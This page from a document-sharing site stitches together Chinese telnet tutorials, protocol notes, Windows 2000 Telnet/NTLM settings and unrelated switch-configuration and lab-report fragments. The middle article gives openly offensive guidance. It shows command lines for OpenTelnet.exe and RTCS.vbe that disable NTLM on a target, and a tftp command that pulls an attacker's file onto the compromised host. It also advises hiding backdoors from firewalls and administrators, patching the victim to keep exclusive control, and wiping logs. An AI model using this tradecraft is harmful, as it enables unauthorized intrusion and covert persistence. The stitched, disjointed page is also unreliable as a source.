文档库 最新最全的文档下载
当前位置:文档库 › 使用telnet命令访问远程计算机

使用telnet命令访问远程计算机

使用telnet命令访问远程计算机
使用telnet命令访问远程计算机

使用telnet命令访问远程计算机

用户使用telnet命令进行远程登录。该命令允许用户使用telnet协议在远程计算机之间进行通信,用户可以通过网络在远程计算机上登录,就像登录到本地机上执行命令一样。为了通过telnet登录到远程计算机上,必须知道远程机上的合法用户名和口令。

虽然有些系统确实为远程用户提供登录功能,但出于对安全的考虑,要限制来宾的操作权限,因此,这种情况下能使用的功能是很少的。当允许远程用户登录时,系统通常把这些用户放在一个受限制的shell中,以防系统被怀有恶意的或不小心的用户破坏。用户还可以使用telnet从远程站点登录到自己的计算机上,检查电子邮件、编辑文件和运行程序,就像在本地登录一样。

但是,用户只能使用基于终端的环境而不是X Wndows环境,telnet只为普通终端提供终端仿真,而不支持 X Wndow等图形环境。

telnet命令的一般形式为:

telnet 主机名/IP 其中“主机名/IP”是要连接的远程机的主机名或IP地址。

例:telnet 192.168.0.1

如果这一命令执行成功,将从远程机上得到login:提示符。

使用telnet命令登录的过程如下:$ telnet 主机名/IP 启动telnet会话。

一旦telnet成功地连接到远程系统上,就显示登录信息并提示用户输人用户名和口令。如果用户名和口令输入正确,就能成功登录并在远程系统上工作。在telnet提示符后面可以输入很多命令,用来控制telnet会话过程,在telnet联机帮助手册中对这些命令有详细的说明。

下面是一台Linux计算机上的telnet会话举例:

$ telnet server. somewhere. com Trying 127.0.0.1… Connected to serve. somewhere. com. Escape character is \';?]\';. “TurboLinux release 4. 0 (Colgate) kernel 2.0.18 on an I486

login: bubba password: Last login:Mon Nov l5 20:50:43 for localhost Linux 2. 0.6. (Posix). server: ~$ server: ~$ logout Connection closed by foreign host $

用户结束了远程会话后,一定要确保使用logout命令退出远程系统。然后telnet报告远程会话被关闭,并返回到用户的本地机的Shell提示符下。

r-系列命令除ftp和telnet以外,还可以使用r-系列命令访问远程计算机和在网络上交换文件。使用r-系列命令需要特别注意,因为如果用户不小心,就会造成严重的安全漏洞。用户发出一个r-系列命令后,远程系统检查名为/etc/hosts.equiv的文件,以查看用户的主机是否列在这个文件中。如果它没有找到用户的主机,就检查远程机上同名用户的主目录中名为.rhosts的文件,看是否包括该用户的主机。如果该用户的主机包括在这两个文件中的任何一个之中,该用户执行r-系列命令就不用提供口令。

虽然用户每次访问远程机时不用键入口令可能是非常方便的,但是它也可能会带来严重的安全问题。我们建议用户在建立/etc/hosts.equiv和.rhosts文件之前,仔细考虑r-命令隐含的安全问题。

******************************************************

telnet命令的使用详解

一摘要

Telnet的应用不仅方便了我们进行远程登录,也给hacker们提供了又一种入侵手段和后门,但无论如何,在你尽情享受Telnet所带给你的便捷的同时,你是否真正的了解Telnet 呢?

二远程登录

Telnet服务虽然也属于客户机/服务器模型的服务,但它更大的意义在于实现了基于Telnet协议的远程登录(远程交互式计算),那么就让我们来认识一下远程登录。

1 远程登陆的基本概念

先来看看什么叫登录:分时系统允许多个用户同时使用一台计算机,为了保证系统的安全和记帐方便,系统要求每个用户有单独的帐号作为登录标识,系统还为每个用户指定了一个口令。用户在使用该系统之前要输入标识和口令,这个过程被称为';登录';。

远程登陆是指用户使用Telnet命令,使自己的计算机暂时成为远程主机的一个仿真终端的过程。仿真终端等效于一个非智能的机器,它只负责把用户输入的每个字符传递给主机,再将主机输出的每个信息回显在屏幕上。

2 远程登陆的产生及发展

我们可以先构想一个提供远程文字编辑的服务,这个服务的实现需要一个接受编辑文件请求和数据的服务器以及一个发送此请求的客户机。客户机将建立一个从本地机到服务器的TCP连接,当然这需要服务器的应答,然后向服务器发送键入的信息(文件编辑信息),并读取从服务器返回的输出。以上便是一个标准而普通的客户机/服务器模型的服务。

似乎有了客户机/服务器模型的服务,一切远程问题都可以解决了。然而实际并非你想象的那样简单,如果我们仅需要远程编辑文件,那么刚才所构想的服务完全可以胜任,但假如我们的要求并不是这么简单,我们还想实现远程用户管理,远程数据录入,远程系统维护,想实现一切可以在远程主机上实现的操作,那么我们将需要大量专用的服务器程序并为每一个可计算服务都使用一个服务器进程,随之而来的问题是:远程机器会很快对服务器进程应接不暇,并淹没在进程的海洋里(我们在这里排除最专业化的远程机器)。

那么有没有办法解决呢?当然有,我们可以用远程登录来解决这一切。我们允许用户在远地机器上建立一个登录会话,然后通过执行命令来实现更一般的服务,就像在本地操作一样。这样,我们便可以访问远地系统上所有可用的命令,并且系统设计员不需提供多个专用地服务器程序。

问题发展到这里好像前途一片光明了,用远程登录总应该解决问题了吧,但要实现远程登陆并不简单。不考虑网络设计的计算机系统期望用户只从直接相连的键盘和显示器上登录,在这种机器上增加远程登陆功能需要修改机器的操作系统,这是极其艰巨也是我们尽量避免的。因此我们应该集中力量构造远程登陆服务器软件,虽然这样也是比较困难的。为什么说这样做也比较困难呢?

举个例子来说:一般,操作系统会为一些特殊按键分配特殊的含义,比如本地系统将';Ctrl+C';解释为:';终止当前运行的命令进程';。但假设我们已经运行了远程登陆服务器软件,';Ctrl+C';也有可能无法被传送到远地机器,如果客户机真的将';Ctrl+C';传到了远地机器,那么';Ctrl+C';这个命令有可能不能终止本地的进程,也就是说在这里很可能会产生混乱。而且这仅仅是遇到的难题之一。

但尽管有技术上的困难,系统编程人员还是设法构造了能够应用于大多数操作系统的远程登陆服务器软件,并构造了充当客户机的应用软件。通常,客户机软件取消了除一个键以外的所有键的本地解释,并将这些本地解释相应的转换成远地解释,这就使得客户机软件与远地机器的交互,就如同坐在远程主机面前一样,从而避免了上述所提到的混乱。而那个唯一例外的键,可以使用户回到本地环境。

将远程登陆服务器设计为应用级软件,还有另一个要求,那就是需要操作系统提供对伪终端(pseudo terminal)的支持。我们用伪终端描述操作系统的入口点,它允许像Telnet 服务器一样的程序向操作系统传送字符,并且使得字符像是来自本地键盘一样。只有使用这样的操作系统,才能将远程登陆服务器设计为应用级软件(比如Telnet服务器软件),否则,本地操作系统和远地系统传送将不能识别从对方传送过来的信息(因为它们仅能识别从本地键盘所键入的信息),远程登陆将宣告失败。

将远程登陆服务器设计为应用级软件虽然有其显著的优点:比将代码嵌入操作系统更易修改和控制服务器。但其也有效率不高的缺点(后面的内容将会给予解释),好在用户键入信息的速率不高,这种设计还是可以接受的。

3 远程登录的工作过程

使用Telnet协议进行远程登陆时需要满足以下条件:在本的计算机上必须装有包含Telnet协议的客户程序;必须知道远程主机的Ip地址或域名;必须知道登录标识与口令。

Telnet远程登录服务分为以下4个过程:

1)本地与远程主机建立连接。该过程实际上是建立一个TCP连接,用户必须知道远程主机的Ip地址或域名;

2)将本地终端上输入的用户名和口令及以后输入的任何命令或字符以NVT(Net Virtual Terminal)格式传送到远程主机。该过程实际上是从本地主机向远程主机发送一个IP数据报;

3)将远程主机输出的NVT格式的数据转化为本地所接受的格式送回本地终端,包括输入命令回显和命令执行结果;

4)最后,本地终端对远程主机进行撤消连接。该过程是撤销一个TCP连接。

上面的内容只是讨论了远程登陆最基本的东西,其中的复杂和编程人员的艰辛是我们难以想象的,不知道你在舒服的使用Telnet的同时,是否想到了这些!

三 Telnet协议

我们知道Telnet服务器软件是我们最常用的远程登录服务器软件,是一种典型的客户机/服务器模型的服务,它应用Telnet协议来工作。那么,什么是Telnet协议?它都具备哪些特点呢?

1 基本内容

Telnet协议是TCP/IP协议族中的一员,是Internet远程登陆服务的标准协议。应用Telnet协议能够把本地用户所使用的计算机变成远程主机系统的一个终端。它提供了三种基本服务:

1)Telnet定义一个网络虚拟终端为远的系统提供一个标准接口。客户机程序不必详细了解远的系统,他们只需构造使用标准接口的程序;

2)Telnet包括一个允许客户机和服务器协商选项的机制,而且它还提供一组标准选项;

3)Telnet对称处理连接的两端,即Telnet不强迫客户机从键盘输入,也不强迫客户机在屏幕上显示输出。

2 适应异构

为了使多个操作系统间的Telnet交互操作成为可能,就必须详细了解异构计算机和操作系统。比如,一些操作系统需要每行文本用ASCII回车控制符(CR)结束,另一些系统则需要使用ASCII换行符(LF),还有一些系统需要用两个字符的序列回车-换行(CR-LF);再比如,大多数操作系统为用户提供了一个中断程序运行的快捷键,但这个快捷键在各个系统中有可能不同(一些系统使用CTRL+C,而另一些系统使用ESCAPE)。如果不考虑系统间的异构性,那么在本地发出的字符或命令,传送到远地并被远地系统解释后很可能会不准确或者出现错误。因此,Telnet协议必须解决这个问题。

为了适应异构环境,Telnet协议定义了数据和命令在Internet上的传输方式,此定义被称作网络虚拟终端NVT(Net Virtual Terminal)。它的应用过程如下:

对于发送的数据:客户机软件把来自用户终端的按键和命令序列转换为NVT格式,并发送到服务器,服务器软件将收到的数据和命令,从NVT格式转换为远地系统需要的格式;

对于返回的数据:远地服务器将数据从远地机器的格式转换为NVT格式,而本地客户机将将接收到的NVT格式数据再转换为本地的格式。

对于NVT格式的详细定义,有兴趣的朋友可以去查找相关资料。

3 传送远地命令

我们知道绝大多数操作系统都提供各种快捷键来实现相应的控制命令,当用户在本地终端键入这些快捷键的时候,本地系统将执行相应的控制命令,而不把这些快捷键作为输入。那么对于Telnet来说,它是用什么来实现控制命令的远地传送呢?

Telnet同样使用NVT来定义如何从客户机将控制功能传送到服务器。我们知道USASCII 字符集包括95个可打印字符和33个控制码。当用户从本地键入普通字符时,NVT将按照其原始含义传送;当用户键入快捷键(组合键)时,NVT将把它转化为特殊的ASCII字符在网络上传送,并在其到达远地机器后转化为相应的控制命令。将正常ASCII字符集与控制命令区分主要有两个原因:

1)这种区分意味着Telnet具有更大的灵活性:它可在客户机与服务器间传送所有可能的ASCII字符以及所有控制功能;

2)这种区分使得客户机可以无二义性的指定信令,而不会产生控制功能与普通字符的混乱。

4 数据流向

上面我们提到过将Telnet设计为应用级软件有一个缺点,那就是:效率不高。这是为什么呢?下面给出Telnet中的数据流向:

数据信息被用户从本地键盘键入并通过操作系统传到客户机程序,客户机程序将其处理后返回操作系统,并由操作系统经过网络传送到远地机器,远地操作系统将所接收数据传给服务器程序,并经服务器程序再次处理后返回到操作系统上的伪终端入口点,最后,远地操作系统将数据传送到用户正在运行的应用程序,这便是一次完整的输入过程;输出将按照同一通路从服务器传送到客户机。

因为每一次的输入和输出,计算机将切换进程环境好几次,这个开销是很昂贵的。还好用户的键入速率并不算高,这个缺点我们仍然能够接受。

5 强制命令

我们应该考虑到这样一种情况:假设本地用户运行了远地机器的一个无休止循环的错误命令或程序,且此命令或程序已经停止读取输入,那么操作系统的缓冲区可能因此而被占满,如果这样,远地服务器也无法再将数据写入伪终端,并且最终导致停止从TCP连接读取数据,TCP连接的缓冲区最终也会被占满,从而导致阻止数据流流入此连接。如果以上事情真的发生了,那么本地用户将失去对远地机器的控制。

为了解决此问题,Telnet协议必须使用外带信令以便强制服务器读取一个控制命令。我们知道TCP用紧急数据机制实现外带数据信令,那么Telnet只要再附加一个被称为数据标记(date mark)的保留八位组,并通过让TCP发送已设置紧急数据比特的报文段通知服务器便可以了,携带紧急数据的报文段将绕过流量控制直接到达服务器。作为对紧急信令的相应,服务器将读取并抛弃所有数据,直到找到了一个数据标记。服务器在遇到了数据标记后将返回正常的处理过程。

6 选项协商

由于Telnet两端的机器和操作系统的异构性,使得Telnet不可能也不应该严格规定每一个telnet连接的详细配置,否则将大大影响Telnet的适应异构性。因此,Telnet采用选项协商机制来解决这一问题。

Telnet选项的范围很广:一些选项扩充了大方向的功能,而一些选项制涉及一些微小细节。例如:有一个选项可以控制Telnet是在半双工还是全双工模式下工作(大方向);还有一个选项允许远地机器上的服务器决定用户终端类型(小细节)。

Telnet选项的协商方式也很有意思,它对于每个选项的处理都是对称的,即任何一端都可以发出协商申请;任何一端都可以接受或拒绝这个申请。另外,如果一端试图协商另一端不了解的选项,接受请求的一端可简单的拒绝协商。因此,有可能将更新,更复杂的Telnet 客户机服务器版本与较老的,不太复杂的版本进行交互操作。如果客户机和服务器都理解新的选项,可能会对交互有所改善。否则,它们将一起转到效率较低但可工作的方式下运行。所有的这些设计,都是为了增强适应异构性,可见Telnet的适应异构性对其的应用和发展是多么重要。

上面讨论了一些原理方面的东西,虽然我们在Telnet的使用过程中很难接触到这一层面,但我认为了解这些是有意义的,它会给我们带来许多启示。下面让我们来看看Win2000的Telnet服务。

四 Win2000的Telnet服务

其实从应用层面上,Win2000的Telnet服务并没有什么可说的,绝大部分内容你都可以从HELP文件中得到,我在此只是把它稍微整理一下而已。

1 基本配置

Win2000为我们提供了Telnet客户机和服务器程序:Telnet.exe是客户机程序(Client),tlntsvr.exe是服务器程序(server),同时它还为我们提供了Telnet服务器管理程序tlntadmn.exe。

Windows 2000 默认安装了 Telnet 服务,但是并没有默认启动。下面给出HELP文件中Telnet 服务的一部分默认设置:

AllowTrustedDomain:是否允许域用户访问。默认值是1,允许信任域用户访问。可以改为0: 不允许域用户访问(只允许本地用户)。

DefaultDomain:可以对与该计算机具有信任关系的任何域设置。默认值是"."。

DefaultShell:显示 shell 安装的路径位置。默认值是: %systemroot%System32Cmd.exe /q /k

MaxFailedLogins:在连接终止之前显示尝试登录失败的最大次数。默认是3。

LoginScript:显示Telnet 服务器登录脚本的路径位置。默认的位置就是“%systemroot%System32login.cmd”,你可以更改脚本内容,这样登录进Telnet的欢迎屏幕就不一样了。

NTLM:NTLM身份验证选项。默认是2。可以有下面这些值:

0: 不使用 NTLM 身份验证。

1: 先尝试 NTLM 身份验证,如果失败,再使用用户名和密码。

2: 只使用 NTLM 身份验证。

TelnetPort:显示 telnet 服务器侦听 telnet 请求的端口。默认是:23。你也可以更改为其他端口。

以上各项设置你可以使用tlntadmn.exe(Telnet服务器管理程序)来进行非常方便的配置,配置后需要重新启动Telnet服务。如图1

2 NTLM

提到了telnet就不能不提NTLM,我想这也是让入侵者最为头痛的一件事,哪怕你获得了管理员帐号和密码,想简单通过NTLM也并非易事,况且win2000中的telnet默认仅以NTLM 方式验证身份,这就让我们不得不关注NTLM这个东东,那么什么是NTLM呢?

早期的SMB协议在网络上明文传输口令,后来出现了"LAN Manager Challenge/Response"验证机制,简称LM,它十分简单以至很容易被破解,微软随后提出了WindowsNT挑战/响应验证机制,即NTLM。现在已经有了更新的NTLMv2以及Kerberos验证体系。NTLM工作流程是这样的:

1、客户端首先在本地加密当前用户的密码成为密码散列

2、客户端向服务器发送自己的帐号,这个帐号是没有经过加密的,明文直接传输

3、服务器产生一个16位的随机数字发送给客户端,作为一个 challenge(挑战)

4、客户端再用加密后的密码散列来加密这个 challenge ,然后把这个返回给服务器。作为 response(响应)

5、服务器把用户名、给客户端的challenge 、客户端返回的 response 这三个东西,发送域控制器

6、域控制器用这个用户名在 SAM密码管理库中找到这个用户的密码散列,然后使用这个密码散列来加密 challenge。

7、域控制器比较两次加密的 challenge ,如果一样,那么认证成功。

从上面的过程我们可以看出,NTLM是以当前用户的身份向Telnet服务器发送登录请求的,而不是用你扫到的对方管理员的帐户和密码登录,显然,你的登录将会失败。举个例子来说,你家的机器名为A(本地机器),你入侵的机器名为B(远地机器),你在A上的帐户是xinxin,密码是1234,你扫到B的管理员帐号是Administrator,密码是5678,当你想Telnet 到B时,NTLM将自动以当前用户的帐号和密码作为登录的凭据来进行上面的7项操作,即用xinxin和1234,而并非用你扫到的Administrator和5678,且这些都是自动完成的,根本不给你插手的机会,因此你的登录操作将失败。

由于Telnet服务器对NTLM的使用有3个选项,所以当你Telnet远地机器时,会显示下面情况中的一种:

1)身份验证选项=0时

=====================================

Microsoft (R) Windows (TM) Version 5.00 (Build 2195)

Welcome to Microsoft Telnet Service

Telnet Server Build 5.00.99201.1

login:

password:

\为0时不使用NTML身份验证,直接输入用户名和密码,比如你可以输入扫到的Administrator和5678

2)身份验证选项=1时

=====================================

NTLM Authentication failed due to insufficient credentials. Please login withclear text username and password

Microsoft (R) Windows (TM) Version 5.00 (Build 2195)

Welcome to Microsoft Telnet Service

Telnet Server Build 5.00.99201.1

login:

password:

\先尝试 NTLM 身份验证,如果失败,再使用用户名和密码,其实这种方式对于我们来说,与上一种方式没什么区别

3)身份验证选项=2时

=====================================

NTLM Authentication failed due to insufficient credentials. Please login withclear text username and password

Server allows NTLM authentication only

Server has closed connection

遗失对主机的连接。

C:>

\仔细看看上面的显示,根本没有给你输入用户名和密码的机会,直接断开连接,扫到了密码也是白扫

所以对于入侵者来说,NTLM是横在我们面前的一座大山,必须要除掉它,一般我们有如下几种方法:

1通过修改远程注册表更改telnet服务器配置,将验证方式从2改为1或0;

2使用NTLM.exe,上传后直接运行,可将telnet服务器验证方式从2改为1;

3在本地建立扫描到的用户,以此用户身份开启telnet客户机并进行远程登录;

4使用软件,比如opentelnet.exe(需要管理员权限且开启IPC管道)

5使用脚本,如RTCS,(需要管理员权限但不依赖IPC管道)

基本上是以上的5种,其中后两种是我们比较常用的开telnet的手法,而且使用方法十分简单,命令如下:

OpenTelnet.exe \server username password NTLMAuthor telnetport

OpenTelnet.exe \服务器地址管理员用户名密码验证方式(填0或1) telnet端口

cscript RTCS.vbe targetIP username password NTLMAuthor telnetport

cscript RTCS.vbe <目标IP> <管理员用户名> <密码> <验证方式>

五在telnet中该做什么

本来写到上面就想结束了,不过许多朋友都说telnet上去后不知道该做什么了,既然这样,那我就抛砖引玉吧,这次不讲具体做法,只是说说思路,什么?为什么不讲具体做法?篇幅不够嘛,以后我会一一解释的。

1 查看系统信息

呵呵,其实就是随处看看,看看他的系统配置和版本(用type c:oot.ini来知道pro 版或server版),看看都装了什么服务或软件(从目录名就可以知道了),看看有什么重要或有趣的文件啦(唉,要是国外的机器,看也看不懂),看看他的用户情况,总之就是尽可能多的了解系统,为一会装后门摸底。

2 使用tftp传送文件

想必大家都遇到过在telnet中传输文件的问题,因为我们习惯了在ipc管道中的文件传输,所以有些朋友喜欢用net share ipc$ 来打开管道,进而利用copy来传输文件。不过这样反而麻烦,既然我们已经得到了shell,我们可以用TFPT命令来完成这一切,什么是TFTP呢?

用TFTP(Trivial File Transfer Protocol)来实现文件的传送是一种基于UDP连接的文件传输,一般是使用Windows自带的tftp.exe和一个TFTP服务器端软件构成一个完整的传输结构。它是这样使用的:首先运行本地的TFTP Server(比如tftpd32.exe)软件并保证始终开启直至传输全部完成,然后在telnet中(当然你也可以在其他shell中)运行下面的命令:

C:>tftp –i ip get xinxin.exe c:abcxinxin.exe

其中ip为你自己机器的ip,且上传文件要与TFTP服务器端在同一目录下,这样你就可以把xinxin.exe上传到c盘abc目录下了(其实是从tftp服务器下载来的)

需要指出的是,如果使用代理IP,你将不能实现与外部网络的文件传送。因为你的代理

网关在进行数据封装的时候会将自己的IP地址加入到你的数据报中,代替你的内部网络地址,所以在外部网络进行MAC寻址时是找不到你这台TFTP服务器的。

3 安置后门

安置后门放在第二步好像早了点,如果你入侵还有其他目的,比如以破坏为主,或者是来修改主页的,那么这些事情当然可以在安置后门之前做;如果你只是想得到一只肉鸡,那就没什么可说的了,安后门吧。

后门的种类繁多,也给我们提供了很大的选择余地,能够根据具体情况选择合适的后门的确是一门学问。常用的后门一般有:木马,asp木马,远程控制软件,克隆帐户,建立并隐藏帐户,telnet,telnet扩展的shell,终端服务等。安置一个好的后门通常要注意以下几点:

1 不会被防火墙查杀及阻碍通信:被加入病毒库的后门最好加壳以逃过防火墙,尽量用低端口通信,以免被防火墙屏蔽。

2 最大限度增加隐蔽性:如果你选择远程控制软件,要注意被控端的安装提示和小图标,以及是否同步画面;如果你在帐户上做文章,要尽量保持在cmd和用户管理中都不出破绽;如果你选择放木马或telnet扩展,要注意文件和进程的隐藏;如果新开了终端服务(入侵前并没有开),一定要该掉3389这个显眼的端口,且越低越好。

3 不要当管理员不存在:这是一个大忌,许多朋友在只有默认帐户的机器上建立类似';hacking';的管理员帐户,真是无知者无畏呀。所以安置后门的时候,想想管理员疏忽的地方会在哪里。

4 打补丁

如果想独霸肉鸡,就要会打补丁,要知道对肉鸡的竞争是很激烈的。怎么打补丁呢?这个也要问?想想你是怎么进来的吧。算了,提示一下,除了修补大的漏洞以外(上传官方补丁并运行),也要注意它的共享,ipc$共享(最好都关闭),可疑端口,容易被利用的服务等。不过打补丁也要注意隐蔽性的,不要让管理员发现大的改动。

5 清除日志

可以手动或利用软件,如果不太会就去找相关教材吧,在这里我不详细介绍了。

六结束语

文章的前部分主要说了一些原理性的东西,后部分则侧重于应用,写的多了难免会有些遗漏。

************************************************

当开始运行Telnet时,情况如何呢?一个应用系统由两部分组成:“client”——这就是Telnet

简介所说的客户机,另一部分是“server”——这是运行于网络计算机上提供服务的系统,称之为服务器。而网络(即使用TCP也使用UDP的服务器)则是提供两者(Clinet与Server)通信的工具。

这里要求客户机必须做到:

(1)建立一个网络与服务器间的TCP连接

(2)以方便的方式接收输入

(3)对某些标准的格式化输入作重新格式化并作重新格式化并传送给服务器。

(4)以某些标准的格式化从服务器中接受输出

(5)重新格式化显示给自己的输出

服务器软件是运行于主机上提供服务的系统,如果没有运行服务系统,也就不能提供相应的服务。

某一类服务被调用,它就可以:

(1)通知网络软件,让它准备连接;

(2)等待一个标准的格式化要求的产生;

(3)服务请求;

(4)传送一个标准格式的结果给客户;

(5)重新等待

一个服务器应该能够处理各种客户,有的是运行在同类的电脑上的,而有的是运行在 IBM / PCs , Macintoshes , Amigas等各种不同的机器上。为了做到这一点,服务器必须具有一套通信规则,这种规则通常叫做协议。由于Telnet协议用于两个应用层之间所以叫做应用层协议。任何人都可以在任何类型的电脑上编制一个客户机。只要这个客户机可以上网通讯并遵守协议,他就可以进入服务器。实际上也就是说,用户的 Macintosh可以使用Telnet和其他的的Internet的工具,从而能让很多不同的系统为其工作。

就使用来说,一个应用层协议通常允许客户机和服务器有不同的数据设定,并通告客户机和服务器使用相互的通信方式。这些经常是有每行在开始的几个字节的文本程序来完成的。如果服务器发送一个以“TXT”字符开头的行命令给客户,那么这行“TXT”后边其他的数据就被送入屏幕显示。如果一行的开始是以“CMD”开始,则表明这些信息是从服务软件到客户软件。使用者是看不到这些的,这是因为在信息传送到时这些控制信号已去掉了。

除了在Telnet是如何工作的例子介绍的以外,Telnet还有很多的特点。Telnet可发送除了"escape"的任何字符到远程主机上。因为"escape"字符在Telnet中是客户机的一个特殊的命令模式,它的默认值是"Ctrl-]"。但要注意不要与键盘上的Esc键混淆,我们可以设定"escape"为任意某个字符,只是对Telnet来说以为着该字符不可能再被传送到远程主机上,而Esc键是一非打印字符,Telnet用它来删除远程系统中的命令。而且还应记住,"escape"字符并不总以"Ctrl-]"来表示。

可以仅仅键入Telnet,后面不带机器字句。这种情况下所看到的是Telnet>,这是告知Telnet 在等待键入命令,比如键入问号"?"那么就得到一个有用的命令表:

telnet: ?

CoMMands may be abbreviated, CoMMand are:

open connect to a site

close close currect connection

quit exit telnet

display display operating parameters

send transmit special characters (';send ?'; for more)

set set operating parameters(';set ?'; for more)

status print status information

toggle toggle operating parameters(';toggle ?'; for more)

mode try to enter line-by-line or character-at-a-time mode

? print help information

虽然命令很多,甚至还有子命令,但只有一些是常用的。现在介绍以下的几个:

Close:

该命令用语终止连接。它自动切断与远程系统的连接,也可以用它退出Telnet,在冒失的进入一个网络主机时,想退出的话,就可以用到这个命令。

open:

用它来与一个命名机器连接,要求给出目标机器的名字或IP地址。如果未给出机器名,Telnet 就将要你选择一个机器名。必须注意,在使用"Open"命令之前应该先用"close"来关闭任何已经存在的连接。

Set ECHO:

用于本地的响应是On或是Off。作用是是否把输出的内容显示在屏幕上。和DOS的ECHO基本上是一样。如果机器是处于ECHO ON的话,想改变为OFF,那么就可以输入SET ECHO,想再改变回ECHO OFF,那么就再键入SET ECHO就可以了。(这儿说的比较简短,如果有不明白的,可以与我联系)

Set escape char:

建立"escape"字符到某个特殊的符号,若想用某种控制符号来代替,可以用"asis"或者键入符号"^"加字母b(如:^b)。在正常工作时,是不需要用"escape"这个字符的,并且这个被用作"escape"的符号不应该再被使用。这类似于许多程序中对键盘上的每一个键设定其真正的涵义。但如果正在运行一个 daisy-chained 应用系统,那么可以重新议定"escape"字符的特征便是很有用的。例如:用Telnet从系统A到系统B,接着又用Telnet注册进入系统C。如果正在系统C上工作时出了故障,那么当"escape"代表符是相同时,就没法中断系统B到系统C的连接。键入"escape"代表符,将总是处于系统A的命令模式。如果在每个Telnet部分使用不同的"escape"代表符,便可以通过键入适当的符号,来选择其中一个命令模式,这也可以用于其他的应用中(像终端仿真)。

Quit:

用它可顺利地推出Telnet程序。

Z:

用语保留Telnet但暂时回到本地系统执行其他命令。并且在Telnet中的连接以及其他的选择在Telnet恢复时仍被保留。

Carriage Return:

用于不具体的一个命令从命令模式返回到所连接的远程机器上。另外,还有许多其他的命令可以推出命令模式。下面举一个例子,是从注册进入到https://www.wendangku.net/doc/6510946373.html, ,然后进入命令模式,然后返回porky::

telnet https://www.wendangku.net/doc/6510946373.html,

Trying 129.237.128.11...

Connected to https://www.wendangku.net/doc/6510946373.html,.

Escape character is ';^]';.

SunOS UNIX(porky)

login:wl

password:

Last Login: Tue Mar 28 05:35 from https://www.wendangku.net/doc/6510946373.html,

SunOS Release 4.1.3_U1(SLIPPERY1) #3: Sun Nov 20 23:47:23 CST 1999

No match.

if:Expression syntax.

porky/serv/wl%cd/

porky/%CTRL-]

telnet:?

CoMMands may be abbreviated, CoMMand are:

open connect to a site

close close currect connection

quit exit telnet

display display operating parameters

send transmit special characters (';send ?'; for more)

set set operating parameters(';set ?'; for more)

status print status information

toggle toggle operating parameters(';toggle ?'; for more)

mode try to enter line-by-line or character-at-a-time mode

? print help information

telnet:set escape ^b

escape character is ’^b’

porky/%logout

https://www.wendangku.net/doc/6510946373.html,%

注意:set命令也可以退出命令模式。当然,如果不行,可以回车输入一空行,也能回到porky。

实验一:交换机的几种管理方式

1-consol e方式管理交换机

____________________________________________________________________________________________ 2-telnet方式管理交换机 需求一、通过使用密码telnet登陆设备 配置步骤: 1)配置管理地址 Ruijie>enable ------>进入特权模式 Ruijie#configure terminal ------>进入全局配置模式 Ruijie(config)#interface vlan 1 ------>进入vlan 1接口 Ruijie(config-if)#ip address 192.168.33.180 255.255.255.0------>为vlan 1接口上设置管理ip Ruijie(config-if)#exit ------>退回到全局配置模式 2)配置telnet密码 Ruijie(config)#line vty 0 4 ------>进入telnet密码配置模式,0 4表示允许共5个 用户同时telnet登入到交换机 Ruijie(config-line)#login ------>启用需输入密码才能telnet成功 Ruijie(config-line)#password ruijie ------> 将telnet密码设置为ruijie Ruijie(config-line)#exit ------>回到全局配置模式 Ruijie(config)# enable secret ruijie ------>配置进入特权模式的密码为ruijie Ruijie(config)#end ------>退出到特权模式 Ruijie#write ------>确认配置正确,保存配置 验证命令 注意:windows 7默认telent没有安装,如果要验证,先进行以下操作:控制面板----程序和功能----打开或关闭windows功能----勾选telnet客户端----点“确定” 打开电脑的“开始”菜单------运行------ 输入cmd 后回车 需求二、:通过使用用户名和密码telnet登陆设备 配置步骤:

telnet 远程登录交换机典型配置指导

telnet 远程登录交换机典型配置指导 system-view System View: return to User View with Ctrl+Z. [H3C]user-interface vty 0 [H3C-ui-vty0]authentication-mode password [H3C-ui-vty0]set authentication password simple 123456 [H3C-ui-vty0]local-user guest New local user added.

[H3C-luser-guest]password simple 123456 [H3C-luser-guest]service-type telnet level 3 [H3C-luser-guest]quit [H3C]user-interface vty 0 [H3C-ui-vty0]authentication-mode scheme [H3C-ui-vty0]quit [H3C]save The configuration will be written to the device. Are you sure?[Y/N]y

Please input the file name(*.cfg)(To leave the existing filename unchanged press the enter key): Now saving current configuration to the device. Saving configuration. Please wait... ... Unit1 save configuration flash:/20111025.cfg successfully [H3C] %Apr 3 17:39:34:984 2000 H3C CFM/3/CFM_LOG:- 1 -Unit1 saved

使用telnet方式管理交换机

实验报告 课程名称网络课程设计 实验项目使用telnet方式管理交换机 专业信息系统与信息管理班级x班姓名姓名名学号0800000 指导教师实验成绩 2011年3月10日

一、实验名称、目的 实验名称:使用telnet方式管理交换机实验 实验目的: 1、了解什么是带内管理; 2、熟练掌握如何使用telnet方式管理交换机; 二、实验环境、设备 实验环境: 学校有20台交换机支撑着校园网的运营,这20台交换机分别放置在学校的不同位置。作为网络管理员需要对这20台交换机做管理,通过前面学习的知识,我们可以通过带外管理的方式也就是通过console口去管理,那么管理员需要捧着自己的笔记本电脑,并且带着console线去学校的不同位置去调试每台交换机,十分麻烦。 校园网既然是互联互通的,在网络的任何一个信息点都应该能访问其他的信息点,我们为什么不通过网络的方式来调试交换机呢?通过telnet方式,管理员就可以坐在办公室中不动地方地调试全校所有的交换机。 telnet方式和下个实验中的web方式都是交换机的带内管理方式。 提供带内管理方式可以使连接在交换机中的某些设备具备管理交换机的功能。当交换机的配置出现变更,导致带内管理失效时,必须使用带外管理对交换机进行配置管理。 实验设备: 1、DCS-3926S交换机1台 2、PC机1台 3、Console线1根 4、直通网线1根 三、实验原理、拓扑图 拓扑结构图:

四、实验步骤、方法 第一步:交换机恢复出厂设置,设置正确的时钟和标识符。(详见实验四)switch#set default Are you sure? [Y/N] = y switch#write switch#reload Process with reboot? [Y/N] y switch#clock set 15:29:50 2006.01.16 Current time is MON JAN 16 15:29:50 2006 switch# switch#config switch(Config)#hostname DCS-3926S DCS-3926S(Config)#exit DCS-3926S#

神州数码交换机telnet

